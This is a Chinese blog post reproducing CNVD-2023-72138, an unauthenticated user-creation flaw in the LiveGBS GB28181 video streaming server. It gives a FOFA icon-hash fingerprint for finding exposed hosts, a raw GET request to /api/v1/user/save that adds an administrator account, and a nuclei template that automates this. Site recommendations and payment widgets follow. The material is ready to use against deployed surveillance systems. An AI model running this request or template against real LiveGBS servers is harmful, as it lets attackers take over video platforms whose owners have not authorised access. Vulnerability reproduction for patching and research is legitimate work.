LiveGBS user/save 逻辑缺陷漏洞复现(CNVD-2023-72138)

最新推荐文章于 2024-08-22 11:18:17 发布
最新推荐文章于 2024-08-22 11:18:17 发布
阅读量453 收藏
点赞数 4
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nglj9527/article/details/139061127
版权

安徽青柿信息科技有限公司LiveGBS逻辑缺陷漏洞(CNVD-2023-72138)复现

1、漏洞简介

LiveGBS是一款国标(GB28181)流媒体服务软件,可提供提供用户管理及Web可视化页面管理,开源的前端页面源码;提供设备状态管理,可实时查看设备是否掉线等信息等。
安徽青柿信息科技有限公司LiveGBS存在逻辑缺陷漏洞,攻击者可利用该漏洞任意添加用户。

2、资产指纹

fofa:icon_hash=“-206100324”

3、漏洞复现

GET /api/v1/user/save?ID&Username=sectest&Role=%E7%AE%A1%E7%90%86%E5%91%98&Enable=true HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate

在这里插入图片描述

4、nuclei脚本

id: LiveGBSusersave

info:
  name: LiveGBS任意用户添加CNVD-2023-72138
  author: xxx
  severity: high
  description: LiveGBS通过/api/v1/user/save接口添加任意用户
  tags: LiveGBS

http:
  - raw:
      - |
        GET /api/v1/user/save?ID=&Username=sectest&Role=%E7%AE%A1%E7%90%86%E5%91%98&Enable=true HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
        Connection: close

    matchers:     
      - type: dsl
        name: LiveGBSadduser
        dsl:
          - "contains(body,'12345678') || contains(body,'already exists')"
nglj9527
关注
专栏目录
漏洞复现LiveGBS-信息泄漏-list
知黑而守白
07-05 182
LiveGBS是一款支持国标GB28181的流媒体服务,可实现无插件的视频监控和直播,适用于安防、电网等行业。其可提供可视化 WEB 页面管理,开源的前端源码;也支持树型展示,及自定义虚拟目录;支持语音对讲,级联语音对讲;支持云台控制、预置位巡航;LiveGBS list接口处存在逻辑缺陷漏洞,当Cisco IOS XE Web UI在互联网公开时,恶意攻击者可能会利用此漏洞访问系统敏感资源,使服器处于继不安全的状态。限制接口访问权限,添加token等身份校验。
漏洞复现】京师心智心理健康测评系统MyReport.ashx存在敏感信息泄露
失心少年
03-21 262
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!漏洞链接:http://127.0.0.1/FunctionModular/PersonalReport/Ajax/MyReport.ashx?
LiveGBS任意用户密码重置漏洞复现
最新发布
iSee857的博客
08-22 221
LiveGBS /user/list接口存在未授权访问导致可获取用户id,通过组合漏洞/resetpassword。关闭互联网暴露面或接口设置访问权限。
LiveGBS国标流媒体GB28181开放流媒体服务平台-实际测试时问题排查
热门推荐
青柿视频流媒体的博客
04-22 1万+
LiveCMS 和 LiveSMS都部署起来后,浏览器输入ip:10000端口打不开LiveCMS的页面。这种情况一般是LiveCMS的10000端口被其他程序占用了导致。可以先卸载LiveCMS,打开livecms.ini文件,把http端口从10000改成100002或其他端口,再重新安装LiveCMS。
漏洞复现LiveGBS-添加用户-save
知黑而守白
06-20 116
LiveGBS是一款支持国标GB28181的流媒体服务,可实现无插件的视频监控和直播,适用于安防、电网等行业。其可提供可视化 WEB 页面管理,开源的前端源码;也支持树型展示,及自定义虚拟目录;支持语音对讲,级联语音对讲;支持云台控制、预置位巡航;【漏洞复现LiveGBS save接口处存在逻辑缺陷漏洞,当Cisco IOS XE Web UI在互联网公开时,恶意攻击者可能会利用此漏洞添加具有15级访问权限的账户,使服器处于继不安全的状态。
漏洞复现LiveGBS user/save存在逻辑缺陷漏洞
失心少年
05-03 296
LiveGBS user/save存在逻辑缺陷漏洞,未经身份验证的攻击者可利用该漏洞任意添加用户,导致后台服务被接管,造成信息泄露等不良影响。
昂**诚供应链管理系统任意文件上传漏洞复现 CNVD-2023-26756
afei001
05-26 1235
深*市昂*信息技术股份有限公司是一家以软件开发为核心,为零售企业提供全面整合的信息系统解决方案和服务的创新型企业。昂**诚供应*管理系统存在未授权任意文件上传漏洞,攻击者可利用该漏洞获取服务器权限。
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具
11-07
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具。需要 Java1.8 环境,执行如下命令启动 HrmsTool 工具, -e 是加密, -d 是解密。 $ java -jar HrmsTool.jar Usage: java -jar HrmsTool.jar -e xxx java ...
EduSoho教培系统 任意文件读取漏洞复现(CNVD-2023-03903)
0xSec
12-15 1238
该教培系统classroom-course-statistics接口存在未授权任意文件读取漏洞,通过该漏洞攻击者可以读取到config/parameters.yml文件的内容,拿到该文件中保存的secret值以及数据库账号密码等敏感信息。拿到secret值后,攻击者可以结合symfony框架_fragment路由实现RCE
最新0day!!用友U8-Cloud UploadFile接口存在任意文件读取漏洞
weixin_43167326的博客
04-02 705
U8 cloud 聚焦成长型、创新型企业的云 ERP,基于全新的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实现企业互联网资源连接、共享、协同。该系统存在任何文件读取漏洞
安徽青柿信息科技有限公司LiveGBS默认用户名口令漏洞复现
nglj9527的博客
05-20 380
(附Nuclei模板)LiveGBS是一款国标(GB28181)流媒体服务软件,可提供提供用户管理及Web可视化页面管理,开源的前端页面源码;提供设备状态管理,可实时查看设备是否掉线等信息等。安徽青柿信息科技有限公司LiveGBS存在弱口令漏洞,admin/admin。
【未公开】LiveGBS-信息泄漏-list
知黑而守白
05-08 472
LiveGBS是一款支持国标GB28181的流媒体服务,可实现无插件的视频监控和直播,适用于安防、电网等行业。其可提供可视化 WEB 页面管理,开源的前端源码;也支持树型展示,及自定义虚拟目录;支持语音对讲,级联语音对讲;支持云台控制、预置位巡航;
GB28181流媒体服务LiveGBS使用和二次开发中常见问题总结
weixin_30896825的博客
06-01 198
一、背景 在安防监控行业中GB28181协议可以实现获取直播流、录像、报警信息、通道状态等各种信息,基本满足了监控行业中的全部需求。LiveGBS就是一套开放的GB28181流媒体服务平台,提供用户私有化部署、提供标准RESTFul HTTP接口用于二次开发,将视频...
【未公开】瑞友天翼应用虚拟化系统-rce-index.php
知黑而守白
05-07 787
瑞友天翼虚拟化系统是一种基于虚拟化技术的系统,旨在提高硬件资源利用率和灵活性,降低成本,提高效率,适用于各种规模的企业和组织。瑞友天翼应用虚拟化系统index.php接口处存在SQL注入漏洞导致程RCE,恶意攻击者可能会利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失。
脸爱云 一脸通智慧管理平台任意用户添加漏洞
m0_64366018的博客
01-22 385
登录后可以看见其他人的账户密码。
spring boot 调用青柿流媒体喊话接口
coderYJ的博客
01-04 407
技术交流QQ群933925017 livegbs接口 https://gbs.liveqing.com:10010/apidoc/#api-control-ControlTalk 喊话流程是每次取4000个字符然后进行base64encoding–>urlencode 官方给的图片 是用的golang写的 2.java实现 /** * 青柿语音喊话 */ public Boolean liveGBSShout(String file, String serial,.
cnvd-2023-69477
12-08
cnvd-2023-69477是一个由国家信息安全漏洞共享平台发布的漏洞通告编号,该漏洞通告是针对特定软件或硬件产品的安全漏洞描述和修复建议的一个标识。根据cnvd-2023-69477的描述,这个漏洞可能会导致系统的信息泄露、拒绝服务或者远程代码执行等安全风险。建议用户及时关注厂商发布的安全补丁,并严格按照厂商提供的修复建议进行操作,确保系统的安全性。 对于系统管理员和安全工程师来说,他们需要关注cnvd-2023-69477的具体描述和风险评估,及时评估自身系统是否受到影响,快速制定修复计划并进行安全补丁的安装和验证。同时,建议关注该漏洞的后续动态,以便获取更多关于漏洞的详细信息和最新修复方案,及时做好安全防护工作。 总之,cnvd-2023-69477作为一个漏洞通告,提醒着用户和安全从业人员关注系统安全,及时采取措施保护系统,防范潜在的安全风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值